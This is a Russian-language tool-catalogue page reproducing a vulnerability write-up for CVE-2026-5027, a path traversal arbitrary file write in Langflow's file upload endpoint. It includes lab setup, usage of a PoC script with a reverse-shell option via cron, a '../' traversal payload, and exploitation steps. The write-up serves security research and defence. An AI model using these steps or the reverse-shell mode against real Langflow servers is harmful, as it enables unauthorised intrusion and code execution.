Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-5027 — Langflow, удалённое выполнение кода (RCE) через внедрение Cron Job посредством Path Traversal | Kitploit
Инструменты/GitHubGitHub/eqstlab/cve-2026-5027
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubeqstlab/cve-2026-5027

CVE-2026-5027

Langflow, удалённое выполнение кода (RCE) через внедрение Cron Job посредством Path Traversal

Репозиторий
33 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Этот пост — исследовательская статья, опубликованная EQSTLab.

Спасибо Yahia Hamza, который сообщил об этой уязвимости и проанализировал её.

CVE-2026-5027

★ CVE-2026-5027 Langflow: обход пути / произвольная запись файлов PoC ★ Тест PoC CVE-2026-5027


Описание

CVE-2026-5027 : Уязвимость произвольной записи файлов в Langflow

описание: Уязвимость обхода пути в Langflow <= 1.8.4 позволяет злоумышленникам записывать произвольные файлы за пределами предназначенного каталога загрузки с помощью специально сформированного multipart-параметра filename, передаваемого в конечную точку /api/v2/files. В развёртываниях, где включён автоматический вход или аутентификация иным образом реализована недостаточно строго, эта проблема может быть использована для достижения удалённого выполнения кода путём записи контролируемого злоумышленником содержимого в критически важные места файловой системы.


Настройка лабораторного стенда

Соберите и запустите уязвимую среду с помощью Docker:

Сборка образа

root@kitploit:~
docker build -t cve-2026-5027 .

Запуск контейнера

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

Как использовать

Запуск

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

Анализ

Уязвимая конечная точка

root@kitploit:~
POST /api/v2/files

Проблема заключается в том, что функция загрузки доверяет значению multipart-параметра filename, предоставленному клиентом. Вместо генерации безопасного имени хранения на стороне сервера или ограничения итогового пути выделенным каталогом загрузки уязвимый путь выполнения кода позволяет таким последовательностям обхода, как ../, влиять на конечный путь назначения.

В результате злоумышленник может выйти за пределы предполагаемого корневого каталога хранилища и заставить приложение записывать файлы в произвольные места файловой системы сервера.

Типичный сценарий эксплуатации выглядит следующим образом:

  1. Получите токен доступа через обычный вход или развёртывание с включённым автоматическим входом.
  2. Отправьте multipart-запрос на загрузку в /api/v2/files.
  3. Передайте специально сформированный filename, содержащий последовательности обхода пути.
  4. Добейтесь, чтобы Langflow записал контролируемое злоумышленником содержимое за пределами ожидаемого каталога хранения.

По своей сути это проблема CWE-22: Некорректное ограничение имени пути к ограниченному каталогу.

Техническая первопричина

Уязвимость вызвана недостаточной очисткой и проверкой управляемых пользователем путей к файлам при обработке загрузки. Приложение принимает исходное имя файла от клиента и передаёт его в процесс сохранения без надлежащего применения нормализации пути и ограничения его пределов.

С точки зрения защиты, опасный шаблон концептуально аналогичен следующему:

root@kitploit:~
save_path = base_dir / file.filename

Если file.filename содержит компоненты обхода пути, например:

root@kitploit:~
../../../../tmp/poc.txt

то итоговый разрешённый путь может указывать за пределы base_dir, что позволяет выполнить произвольную запись файлов.

Почему это важно

Уязвимости произвольной записи файлов часто серьёзнее стандартных проблем неограниченной загрузки, поскольку злоумышленник контролирует не только содержимое файла, но и путь назначения. В зависимости от привилегий процесса Langflow во время выполнения это может позволить:

  • перезапись файлов приложения
  • изменение файлов автозагрузки или запланированных задач
  • закрепление в системе через файлы инициализации оболочки или ключевые файлы
  • переход от произвольной записи файлов к удалённому выполнению кода

Сценарий

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

Отказ от ответственности

Этот репозиторий не предназначен для содействия несанкционированной эксплуатации экземпляров Langflow. Цель этого проекта — помочь исследователям безопасности, специалистам по защите и разработчикам понять уязвимость, проверить подверженность ей в контролируемых средах и применить эффективные меры защиты.


Ссылки

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

Скачать инструмент